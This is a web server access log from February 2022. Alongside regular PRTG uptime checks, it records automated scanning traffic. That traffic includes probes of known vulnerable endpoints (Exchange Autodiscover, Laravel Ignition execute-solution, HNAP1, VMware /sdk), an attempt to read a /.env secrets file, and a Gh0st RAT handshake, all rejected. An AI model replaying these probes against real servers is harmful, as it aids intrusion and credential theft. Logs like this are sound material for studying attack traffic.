212.91.246.72 - - [03/Feb/2022:11:30:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
8.210.164.233 - - [03/Feb/2022:11:30:39 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
8.210.164.233 - - [03/Feb/2022:11:30:39 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
8.210.164.233 - - [03/Feb/2022:11:30:39 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
8.210.164.233 - - [03/Feb/2022:11:30:40 +0100] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
8.210.164.233 - - [03/Feb/2022:11:30:40 +0100] "GET /text4041643884239 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
8.210.164.233 - - [03/Feb/2022:11:30:40 +0100] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
8.210.164.233 - - [03/Feb/2022:11:30:40 +0100] "GET /text4041643884239 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
8.210.164.233 - - [03/Feb/2022:11:30:40 +0100] "GET /text4041643884239 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
8.210.164.233 - - [03/Feb/2022:11:30:40 +0100] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
8.210.164.233 - - [03/Feb/2022:11:30:40 +0100] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
8.210.164.233 - - [03/Feb/2022:11:30:40 +0100] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
8.210.164.233 - - [03/Feb/2022:11:30:40 +0100] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
8.210.164.233 - - [03/Feb/2022:11:30:40 +0100] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
8.210.90.76 - - [03/Feb/2022:11:30:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
8.210.164.233 - - [03/Feb/2022:11:30:41 +0100] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
8.210.164.233 - - [03/Feb/2022:11:30:41 +0100] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
8.210.164.233 - - [03/Feb/2022:11:30:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
8.210.164.233 - - [03/Feb/2022:11:30:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
8.210.164.233 - - [03/Feb/2022:11:30:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
8.210.164.233 - - [03/Feb/2022:11:30:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
8.210.164.233 - - [03/Feb/2022:11:30:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:30:42 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
45.146.165.37 - - [03/Feb/2022:11:30:42 +0100] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
8.210.164.233 - - [03/Feb/2022:11:30:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:30:42 +0100] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
47.243.167.15 - - [03/Feb/2022:11:30:42 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:30:42 +0100] "GET /text4041643884242 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
8.210.90.76 - - [03/Feb/2022:11:30:42 +0100] "GET /text4041643884242 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
47.243.167.15 - - [03/Feb/2022:11:30:43 +0100] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
47.243.167.15 - - [03/Feb/2022:11:30:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
47.243.161.137 - - [03/Feb/2022:11:30:43 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
8.210.90.76 - - [03/Feb/2022:11:30:43 +0100] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
47.243.161.137 - - [03/Feb/2022:11:30:43 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
47.243.138.243 - - [03/Feb/2022:11:30:43 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
8.210.90.76 - - [03/Feb/2022:11:30:44 +0100] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
47.243.167.15 - - [03/Feb/2022:11:30:44 +0100] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
47.243.161.137 - - [03/Feb/2022:11:30:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
8.210.90.76 - - [03/Feb/2022:11:30:44 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
47.243.138.243 - - [03/Feb/2022:11:30:44 +0100] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
47.243.138.243 - - [03/Feb/2022:11:30:44 +0100] "GET /text4041643884244 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
8.210.90.76 - - [03/Feb/2022:11:30:44 +0100] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
8.210.90.76 - - [03/Feb/2022:11:30:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
47.243.161.137 - - [03/Feb/2022:11:30:45 +0100] "GET /text4041643884243 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
47.243.138.243 - - [03/Feb/2022:11:30:45 +0100] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
47.243.161.137 - - [03/Feb/2022:11:30:45 +0100] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
47.243.161.137 - - [03/Feb/2022:11:30:45 +0100] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
47.243.161.137 - - [03/Feb/2022:11:30:45 +0100] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
47.243.138.243 - - [03/Feb/2022:11:30:45 +0100] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
47.243.138.243 - - [03/Feb/2022:11:30:46 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
47.243.138.243 - - [03/Feb/2022:11:30:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
8.210.164.233 - - [03/Feb/2022:11:30:50 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
8.210.164.233 - - [03/Feb/2022:11:30:50 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
8.210.164.233 - - [03/Feb/2022:11:30:50 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
8.210.164.233 - - [03/Feb/2022:11:30:50 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
8.210.164.233 - - [03/Feb/2022:11:30:51 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
8.210.164.233 - - [03/Feb/2022:11:30:52 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
8.210.90.76 - - [03/Feb/2022:11:30:53 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:30:53 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:30:53 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:30:53 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
8.210.90.76 - - [03/Feb/2022:11:30:53 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:30:53 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:30:54 +0100] "GET /text4041643884253 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
47.243.167.15 - - [03/Feb/2022:11:30:54 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:30:54 +0100] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
47.243.167.15 - - [03/Feb/2022:11:30:54 +0100] "GET /text4041643884253 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
47.243.167.15 - - [03/Feb/2022:11:30:54 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
47.243.161.137 - - [03/Feb/2022:11:30:54 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:30:54 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:30:54 +0100] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
47.243.167.15 - - [03/Feb/2022:11:30:54 +0100] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
47.243.167.15 - - [03/Feb/2022:11:30:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
47.243.161.137 - - [03/Feb/2022:11:30:54 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:30:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:30:54 +0100] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
47.243.167.15 - - [03/Feb/2022:11:30:54 +0100] "GET /text4041643884253 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
47.243.167.15 - - [03/Feb/2022:11:30:55 +0100] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
47.243.167.15 - - [03/Feb/2022:11:30:55 +0100] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
47.243.167.15 - - [03/Feb/2022:11:30:55 +0100] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
47.243.167.15 - - [03/Feb/2022:11:30:55 +0100] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
8.210.164.233 - - [03/Feb/2022:11:30:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
8.210.164.233 - - [03/Feb/2022:11:30:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
8.210.164.233 - - [03/Feb/2022:11:30:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
8.210.164.233 - - [03/Feb/2022:11:30:56 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
8.210.164.233 - - [03/Feb/2022:11:30:56 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
8.210.164.233 - - [03/Feb/2022:11:30:56 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
47.243.138.243 - - [03/Feb/2022:11:30:56 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:30:56 +0100] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
47.243.138.243 - - [03/Feb/2022:11:30:56 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
8.210.164.233 - - [03/Feb/2022:11:30:56 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
8.210.164.233 - - [03/Feb/2022:11:30:56 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
8.210.164.233 - - [03/Feb/2022:11:30:56 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
47.243.167.15 - - [03/Feb/2022:11:30:56 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:30:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
8.210.90.76 - - [03/Feb/2022:11:30:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
8.210.90.76 - - [03/Feb/2022:11:30:58 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
8.210.90.76 - - [03/Feb/2022:11:30:59 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
47.243.167.15 - - [03/Feb/2022:11:31:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
47.243.161.137 - - [03/Feb/2022:11:31:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
47.243.167.15 - - [03/Feb/2022:11:31:00 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
47.243.161.137 - - [03/Feb/2022:11:31:00 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
47.243.167.15 - - [03/Feb/2022:11:31:01 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
47.243.161.137 - - [03/Feb/2022:11:31:01 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
47.243.138.243 - - [03/Feb/2022:11:31:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
47.243.138.243 - - [03/Feb/2022:11:31:02 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
47.243.138.243 - - [03/Feb/2022:11:31:02 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
212.91.246.72 - - [03/Feb/2022:11:31:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
47.243.167.15 - - [03/Feb/2022:11:31:04 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:31:04 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:31:04 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:31:04 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:31:05 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:31:06 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
47.243.167.15 - - [03/Feb/2022:11:31:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
47.243.167.15 - - [03/Feb/2022:11:31:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
47.243.167.15 - - [03/Feb/2022:11:31:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
47.243.167.15 - - [03/Feb/2022:11:31:09 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
47.243.167.15 - - [03/Feb/2022:11:31:09 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
47.243.167.15 - - [03/Feb/2022:11:31:09 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
47.243.167.15 - - [03/Feb/2022:11:31:10 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
47.243.167.15 - - [03/Feb/2022:11:31:10 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
47.243.167.15 - - [03/Feb/2022:11:31:10 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
212.91.246.72 - - [03/Feb/2022:11:32:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:11:32:12 +0100] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:11:33:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:34:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:35:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:11:35:30 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:11:36:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
62.171.132.199 - - [03/Feb/2022:11:36:38 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
62.171.132.199 - - [03/Feb/2022:11:36:50 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
136.144.41.117 - - [03/Feb/2022:11:36:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [03/Feb/2022:11:37:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
62.171.150.168 - - [03/Feb/2022:11:37:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Feb/2022:11:38:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:11:38:48 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
128.14.209.162 - - [03/Feb/2022:11:38:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:11:39:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:40:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:41:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:11:41:10 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
61.219.11.151 - - [03/Feb/2022:11:41:46 +0100] "POST /10 HTTP/1.1" 404 303 "-" "lynx"
212.91.246.72 - - [03/Feb/2022:11:42:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:43:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:44:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:11:44:05 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [03/Feb/2022:11:44:52 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:11:45:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:46:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.194 - - [03/Feb/2022:11:46:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:11:47:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:48:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:49:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.240.205.34 - - [03/Feb/2022:11:50:00 +0100] "Gh0st\xad" 501 321 "-" "-"
212.91.246.72 - - [03/Feb/2022:11:50:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:51:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:52:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:53:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.90.123.84 - - [03/Feb/2022:11:53:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:11:54:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:11:54:38 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:11:55:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:56:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:11:56:31 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:11:57:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.104.138.223 - - [03/Feb/2022:11:57:13 +0100] "GET /fuN3 HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"
45.146.165.37 - - [03/Feb/2022:11:57:45 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:11:58:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:59:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:12:00:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:12:00:48 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:12:01:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:12:02:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:12:03:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:12:04:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:12:05:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:12:06:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:12:06:52 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:12:07:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:12:08:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:12:09:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:12:09:30 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:12:10:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:12:11:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.66.164.26 - - [03/Feb/2022:12:11:51 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
68.66.164.26 - - [03/Feb/2022:12:11:51 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:12:12:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:12:13:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
